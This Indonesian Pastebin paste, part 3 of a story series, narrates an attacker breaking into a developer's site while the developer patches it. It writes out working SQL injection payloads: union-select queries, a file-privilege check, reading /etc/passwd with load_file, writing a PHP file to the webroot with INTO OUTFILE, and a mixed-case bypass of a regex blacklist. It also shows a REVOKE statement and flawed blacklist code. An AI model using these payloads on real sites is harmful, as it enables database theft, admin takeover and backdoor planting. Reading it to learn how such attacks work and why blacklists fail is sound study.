Advertisement
Ribang

Attacker vs Developer 2 ( part 3 )

Nov 19th, 2017
347
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Attacker vs Developer 2 ( part 3 )
  2.  
  3.  
  4. setelah kemarin mendapat perlawanan sengit oleh si Developer,
  5. kini sang Attacker pun kembali kesekian kalinya ke webiste si developer
  6. melihat tampilan website si developer yang kembali di perbaiki dan lebih url friendly
  7. sang attacker pun merasa tertantang untuk kembali mengetes system di website tersebut
  8. dia melihat bahwa url detail web si developer berubah menjadi url friendly, nah pikir sang Attacker
  9. biasanya alias tersumpan di database dan kemungkinan web si debeloper juga demikian maka sang attacker pun mencoba
  10. dengan cara seperi biasa yakni menyisipkan '
  11. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov.html'
  12. tapi tak ada perubahan sama sekali
  13. kemudian sang attacker berfikir lagi
  14. "bisa jadi si developer cuma menyisipkan alias yang berasal dari judul (the-power-of-papa-setnov) tanpa .html"
  15. kemudian sang attacker pun mencoba memasukan ' ke dalam judul seperti berikut ini
  16. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov'.html
  17. dan hasil yang di dapatkan ialah error 404
  18. vuln ?
  19. sang attacker belum menganggap itu vuln karena wajar bila web merespon dengan 404 bila tidak mendapati data
  20. kemudian sang attacker pun kembali menambahkan qery injeksi -- -untuk meyakinkan bahwa itu bug
  21. bilamana di beri injeksi -- - dan muncul datanya alias kembali true maka di pastikan ini bug
  22. dan setelah web di berikan query injeksi tersebut
  23. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' -- -.html
  24. situs tersebut kembali ke artikel awal dan bisa di katakan bahwa ini bug
  25. berasa dapat angin segar sang attacker pun bersemangat untuk menginjeksi web si developer
  26. dan alhasil sang attacker pun lagi-lagi mendapatkan username dan password admin web si developer
  27. namun ketika sang attacker mengakses admin login web si developer sang attacker hanya mendapati error 404
  28. ternyata tanpa disangka-sangka sang developer bukan hanya mempatch webnya menjadi url friendly namun juga merubah lokasi
  29. backend webnya. tanpa membuang waktu sang attacker pun mengeluarkan toolnya yaitu admin finder tapi tool itu pun tak dapat membantu sang attacker menemukan admin login web tersebut.
  30. tak putus asa sang attcker pun mencoba teknik sql injection into outfie yaitu membuat file lewat query sql.
  31. meskipun bug ini jarang terjadi pada sebuah website namun tak ada jalan sang attacker kecuali mencobanya, dengan bug ini sang attacker tak perlu susah-susah mencari admin login, tapi langsung dengan membuat backdoor dengan menggunakan query sql.
  32. tekniknya sama seperti sql injection manual namun query setellah memasukan version() berubah
  33. setelah mengetahui versi dari mysql sang attacker kemudian mengecek apakah user database yang di pakai si developer dengan cara menyisipkan perintah file_priv
  34. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' union select 1,2,3,group_concat(file_priv),5,6,7,8,9,10 from mysql.user-- -.html
  35. dan website si developer merespon dengan huruf Y yang artinya user database yang di pakai web tersebut mempunyai akses FILE
  36. setelah mengetahui web itu vuln maka sang attacker pun melancarkan aksinya
  37. pertama sang attacker pun mencoba menebak lokasi dir pada website tersebut untuk lokasi file yang akan dia buat nanti
  38. untuk mengetahui lokasi biasanya sang attacker menggunakan beberapa metode salah satunya dengan membaca error pada website
  39. karena biasanya system akan memberitahu directory dan baris pada file yang error.
  40. namun sang attacker tidak bisa mengunakan metode ini dikarenakan si developer sudah menghilangkan errornya ( lihat patc avd 2 part 1). namun tak putus asa sang atacker pun mencoba metode LFI untuk melihat dokumen rootnya
  41. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' union select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10-- -.html
  42. root:x:0:0:root:/root:/bin/bash
  43. daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
  44. bin:x:2:2:bin:/bin:/usr/sbin/nologin
  45. sys:x:3:3:sys:/dev:/usr/sbin/nologin
  46. sync:x:4:65534:sync:/bin:/bin/sync
  47. games:x:5:60:games:/usr/games:/usr/sbin/nologin
  48. man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
  49. lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
  50. mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
  51. news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
  52. uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
  53. proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
  54. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  55. dan akhirnya sang attacker pn menemukan directori dari web tersebut yaitu /var/www yang di ambil dari
  56. www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
  57. setelah mengetahui directori dari website tersebut sang attacker melanjutkan aksinya yakni membuat file dengan query sql
  58. dengan menambahkan script file yang akan di upload contoh <?="hello word"?> lalu encode dengan hexa atau mysql char dan menyisipkan query INTO OUTFILE "dir/namafile.php" sebelum query komen
  59. menjadi seperti ini
  60. kali ini sang attacker ingin membuat file 173.php yang berisi "permisi numpang lewat"
  61. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' union select 1,2,3,0x7065726d697369206e756d70616e67206c65776174,5,6,7,8,9,10 INTO OUTFILE "/var/www/173.php"-- -.html
  62. dan alhasil ketika sang attacker megakses
  63. situssideveloper.dev/173.php
  64. dan yang didapatkan ialah sang attcker berhasil
  65. dan selang beberapa menit si developer yang kebetulan sedang mempercantik webnya di kejutkan degan sebuah file 173.php
  66. yang tak pernah ia buat. menyadari ini perbuatan sang attacker sang developer pun kembali mengecek log pada website nya dan di dapati sang attacker memanfaatkan akses privilages file pada user database untuk membuat file baru. segara ia meremove akses file tersebut pada user databasenya.
  67. revoke file on *.* from 'userdatabasenya'@'localhost';
  68. kemudian si developer pun memperbaiki bug sqli kesekian kalinya, sejenak dia memikirkan jalan keluar dari masalah ini dan dia mendapat sebuah ide mempatch bug sql injection pada webnya dengan cara memblacklist perintah union pada sql injection sebagai berikut
  69. if (!preg_match('/(union|form|and)/', $alias)) {
  70. script webistenya..
  71. }else{
  72.     header('HTTP/1.1 404 Not Found');
  73. }
  74. sekitar 1 jam sejak bug tersebug di patch oleh si developer sang attacker pun mengunjungi kembali file yang telah ia buat
  75. sang attacker pun membuka
  76. situssideveloper.dev/173.php
  77. dan apa yang di dapati sang attacker ialah file yang ia buat tadi hilang,dan itu merupakan sebuah pertanda bahwa si developer lagi on. semakin bersemangatlah ia karenakan si developer on. kemudin ia mengulangi penyerangan web si developer dengan metode sebelumnya namun setelah mengeksekusi yang di dapatkan ialah sebuah error 404. kemudian sang attacker mencoba memasukan ist 1 per 1 seperti berikut
  78. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' union -- -.html   |  error
  79. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' select -- -.html  |  tidak error
  80. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' from -- -.html  |  error
  81. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' and -- -.html   |  error
  82. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' where -- -.html   |  tidak error
  83. dan begitu seterusnya dan di dapati hanya perintah union yang di blacklist oleh si developer
  84. dari kesimpulan tersebut sang attacker pun mencoba membypass blacklist tersebut dengan cara membuat perintah yang di blacklist menjadi peritah alay
  85. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' UnIOn select 1,2,3,0x7065726d697369206e756d70616e67206c65776174,5,6,7,8,9,10 INTO OUTFILE "/var/www/173.php"-- -.html
  86. merasa tak ada error sang attacker pun kembali membuka link file yang ia buat
  87. http://situssideveloper.dev/173.php
  88. dan di dapati file yang ia buat tak ada
  89. sang attacker pun mulai curiga bila akses file telah di revoke oleg si developer
  90. dia pun mengecek dengan memasukan perintah file_priv
  91. http://www.situssideveloper.dev/berita/the-power-of-papa-setnov' UnIOn select 1,2,3,group_concat(file_priv),5,6,7,8,9,10 FrOm mysql.user-- -.html
  92. website si developer pun merespon dengan mengeluarkan huruf N yang artinya user tersebut sudah tak memiliki privilages file
  93. setelah mengetahui bahwa web tersebut tak ada privilages file sang attacker pun kembali mengambil data username dan password
  94. namun PR sang attacker ialah halaman admin web si developer tak di temukan. sang attacker pun menemukan sebuah ide yaitu melihat direktori gambar,
  95. kanapa dengan direktori gambar ?
  96. karena ada kemungkinan sebuah gambar yang di upload di direktori admin
  97. dan benar saja sang attacker pun menemukan sebuah file gambar yang di simpan di direktori admin
  98. http://situssideveloper.dev/admin_app/img/logo.jpg
  99. sang attacker pun kembali masuk ke dasboard web si developer
  100. si developer yang sedari tadi memantau aksi sang attacker untuk melihat cara kerja ia menyerang kini si developerpun kembali mempatch webnya
  101. dengan cara dia memindahkan direktori admin dan kembali memperbaiki patch yang berhasil di jebol oleh sang attacker
  102. if (!preg_match('/(union|form|and)/i', $alias)) {
  103. script webistenya..
  104. }else{
  105.     header('HTTP/1.1 404 Not Found');
  106. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement